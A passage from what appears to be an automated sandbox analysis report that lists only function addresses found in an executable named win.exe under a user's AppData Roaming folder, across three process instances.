Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8E8C	16_2_020B8E8C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0E80	16_2_020B0E80
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4A87	16_2_020B4A87
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4E99	16_2_020B4E99
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4694	16_2_020B4694
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4AA0	16_2_020B4AA0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B62A4	16_2_020B62A4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0EB3	16_2_020B0EB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B12DC	16_2_020B12DC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B46D3	16_2_020B46D3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8ED0	16_2_020B8ED0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1ED7	16_2_020B1ED7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B630B	16_2_020B630B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2B01	16_2_020B2B01
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4300	16_2_020B4300
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B00	16_2_020B4B00
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1313	16_2_020B1313
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4F14	16_2_020B4F14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0F2F	16_2_020B0F2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B2D	16_2_020B4B2D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B25	16_2_020B4B25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2F3E	16_2_020B2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1F3C	16_2_020B1F3C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2B37	16_2_020B2B37
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B5C	16_2_020B4B5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1F52	16_2_020B1F52
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2F50	16_2_020B2F50
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B136B	16_2_020B136B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3B6F	16_2_020B3B6F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B6363	16_2_020B6363
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3B60	16_2_020B3B60
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1F7F	16_2_020B1F7F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4F8C	16_2_020B4F8C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2B83	16_2_020B2B83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0F9B	16_2_020B0F9B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4797	16_2_020B4797
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2FA8	16_2_020B2FA8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3BAF	16_2_020B3BAF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B63AC	16_2_020B63AC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4FB8	16_2_020B4FB8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8BBE	16_2_020B8BBE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4BB0	16_2_020B4BB0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2BD8	16_2_020B2BD8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0FEB	16_2_020B0FEB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B47F4	16_2_020B47F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3C0C	16_2_020B3C0C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B641B	16_2_020B641B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4C16	16_2_020B4C16
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0C25	16_2_020B0C25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3C3F	16_2_020B3C3F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2C33	16_2_020B2C33
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B104C	16_2_020B104C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4847	16_2_020B4847
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8C44	16_2_020B8C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0C5B	16_2_020B0C5B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4C68	16_2_020B4C68
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8C6D	16_2_020B8C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3063	16_2_020B3063
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B247D	16_2_020B247D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B6480	16_2_020B6480
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4899	16_2_020B4899
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2C94	16_2_020B2C94
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1094	16_2_020B1094
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0CA6	16_2_020B0CA6
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B10CB	16_2_020B10CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B44CF	16_2_020B44CF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0CC1	16_2_020B0CC1
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B44C0	16_2_020B44C0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B30C4	16_2_020B30C4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B64DB	16_2_020B64DB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8CDA	16_2_020B8CDA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2CD9	16_2_020B2CD9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5CD9	16_2_020B5CD9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B98D8	16_2_020B98D8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B48E3	16_2_020B48E3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4CE4	16_2_020B4CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5CE4	16_2_020B5CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B60FA	16_2_020B60FA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B28FE	16_2_020B28FE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0CF3	16_2_020B0CF3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B98F3	16_2_020B98F3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3114	16_2_020B3114
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8D14	16_2_020B8D14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4D2A	16_2_020B4D2A
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5D21	16_2_020B5D21
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1120	16_2_020B1120
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4520	16_2_020B4520
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B093E	16_2_020B093E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2D30	16_2_020B2D30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4948	16_2_020B4948
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8547	16_2_020B8547
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B095B	16_2_020B095B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8D5C	16_2_020B8D5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B9951	16_2_020B9951
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B116C	16_2_020B116C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B317B	16_2_020B317B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8D7E	16_2_020B8D7E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5D71	16_2_020B5D71
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4570	16_2_020B4570
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2D88	16_2_020B2D88
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4D83	16_2_020B4D83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4985	16_2_020B4985
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0D91	16_2_020B0D91
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B41A7	16_2_020B41A7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45B5	16_2_020B45B5
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8DC3	16_2_020B8DC3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4DE9	16_2_020B4DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0DEF	16_2_020B0DEF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45E0	16_2_020B45E0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45E4	16_2_020B45E4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45F9	16_2_020B45F9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8DFF	16_2_020B8DFF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B09FD	16_2_020B09FD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B31F4	16_2_020B31F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B49F4	16_2_020B49F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0816	17_2_007A0816
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A98CB	17_2_007A98CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0CBA	17_2_007A0CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5CB3	17_2_007A5CB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1D2E	17_2_007A1D2E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A623F	17_2_007A623F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A247D	17_2_007A247D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4C68	17_2_007A4C68
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8C6D	17_2_007A8C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3063	17_2_007A3063
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0C5B	17_2_007A0C5B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A104C	17_2_007A104C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4847	17_2_007A4847
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8C44	17_2_007A8C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3C3F	17_2_007A3C3F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2C33	17_2_007A2C33
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0C25	17_2_007A0C25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A641B	17_2_007A641B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4C16	17_2_007A4C16
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3C0C	17_2_007A3C0C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A60FA	17_2_007A60FA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A28FE	17_2_007A28FE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0CF3	17_2_007A0CF3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A98F3	17_2_007A98F3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A48E3	17_2_007A48E3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4CE4	17_2_007A4CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5CE4	17_2_007A5CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8CDA	17_2_007A8CDA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A64DB	17_2_007A64DB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A98D8	17_2_007A98D8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2CD9	17_2_007A2CD9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5CD9	17_2_007A5CD9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A10CB	17_2_007A10CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A44CF	17_2_007A44CF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A44C0	17_2_007A44C0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0CC1	17_2_007A0CC1
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A30C4	17_2_007A30C4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0CA6	17_2_007A0CA6
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4899	17_2_007A4899
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2C94	17_2_007A2C94
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1094	17_2_007A1094
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A6480	17_2_007A6480
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A317B	17_2_007A317B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8D7E	17_2_007A8D7E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4570	17_2_007A4570
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5D71	17_2_007A5D71
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A116C	17_2_007A116C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A095B	17_2_007A095B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8D5C	17_2_007A8D5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A9951	17_2_007A9951
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4948	17_2_007A4948
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8547	17_2_007A8547
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A093E	17_2_007A093E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2D30	17_2_007A2D30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4D2A	17_2_007A4D2A
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1120	17_2_007A1120
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4520	17_2_007A4520
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A5D21	17_2_007A5D21
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3114	17_2_007A3114
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8D14	17_2_007A8D14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45F9	17_2_007A45F9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8DFF	17_2_007A8DFF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A09FD	17_2_007A09FD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A31F4	17_2_007A31F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A49F4	17_2_007A49F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4DE9	17_2_007A4DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0DEF	17_2_007A0DEF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45E0	17_2_007A45E0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45E4	17_2_007A45E4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8DC3	17_2_007A8DC3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45B5	17_2_007A45B5
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A41A7	17_2_007A41A7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0D91	17_2_007A0D91
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2D88	17_2_007A2D88
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4D83	17_2_007A4D83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4985	17_2_007A4985
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A7E78	17_2_007A7E78
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4A73	17_2_007A4A73
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3275	17_2_007A3275
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1265	17_2_007A1265
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A6253	17_2_007A6253
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8E4B	17_2_007A8E4B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0E4D	17_2_007A0E4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3244	17_2_007A3244
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4638	17_2_007A4638
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3E30	17_2_007A3E30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4E36	17_2_007A4E36
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0A37	17_2_007A0A37
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4A27	17_2_007A4A27
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1204	17_2_007A1204
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A12DC	17_2_007A12DC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A46D3	17_2_007A46D3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8ED0	17_2_007A8ED0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1ED7	17_2_007A1ED7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0EB3	17_2_007A0EB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4AA0	17_2_007A4AA0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A62A4	17_2_007A62A4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4E99	17_2_007A4E99
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4694	17_2_007A4694
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0A88	17_2_007A0A88
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8E8C	17_2_007A8E8C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0E80	17_2_007A0E80
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4A87	17_2_007A4A87
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1F7F	17_2_007A1F7F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A136B	17_2_007A136B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3B6F	17_2_007A3B6F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A6363	17_2_007A6363
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3B60	17_2_007A3B60
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B5C	17_2_007A4B5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1F52	17_2_007A1F52
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2F50	17_2_007A2F50
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2F3E	17_2_007A2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1F3C	17_2_007A1F3C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2B37	17_2_007A2B37
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0F2F	17_2_007A0F2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B2D	17_2_007A4B2D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B25	17_2_007A4B25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1313	17_2_007A1313
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4F14	17_2_007A4F14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A630B	17_2_007A630B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4300	17_2_007A4300
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B00	17_2_007A4B00
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2B01	17_2_007A2B01
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A47F4	17_2_007A47F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0FEB	17_2_007A0FEB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2BD8	17_2_007A2BD8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4FB8	17_2_007A4FB8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8BBE	17_2_007A8BBE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4BB0	17_2_007A4BB0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2FA8	17_2_007A2FA8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3BAF	17_2_007A3BAF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A63AC	17_2_007A63AC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0F9B	17_2_007A0F9B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4797	17_2_007A4797
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4F8C	17_2_007A4F8C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2B83	17_2_007A2B83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B623F	18_2_020B623F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0816	18_2_020B0816
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0CBA	18_2_020B0CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B5CB3	18_2_020B5CB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B98CB	18_2_020B98CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1D2E	18_2_020B1D2E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1204	18_2_020B1204
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4A27	18_2_020B4A27
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4638	18_2_020B4638
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3E30	18_2_020B3E30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0A37	18_2_020B0A37
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4E36	18_2_020B4E36
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8E4B	18_2_020B8E4B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0E4D	18_2_020B0E4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3244	18_2_020B3244
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B6253	18_2_020B6253
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1265	18_2_020B1265
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B7E78	18_2_020B7E78
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4A73	18_2_020B4A73
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3275	18_2_020B3275
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0A88	18_2_020B0A88
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8E8C	18_2_020B8E8C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0E80	18_2_020B0E80
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4A87	18_2_020B4A87
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4E99	18_2_020B4E99
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4694	18_2_020B4694
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4AA0	18_2_020B4AA0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B62A4	18_2_020B62A4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0EB3	18_2_020B0EB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B12DC	18_2_020B12DC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B46D3	18_2_020B46D3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8ED0	18_2_020B8ED0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1ED7	18_2_020B1ED7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B630B	18_2_020B630B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2B01	18_2_020B2B01
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4300	18_2_020B4300
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B00	18_2_020B4B00
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1313	18_2_020B1313
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4F14	18_2_020B4F14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0F2F	18_2_020B0F2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B2D	18_2_020B4B2D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B25	18_2_020B4B25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2F3E	18_2_020B2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1F3C	18_2_020B1F3C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2B37	18_2_020B2B37
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B5C	18_2_020B4B5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1F52	18_2_020B1F52
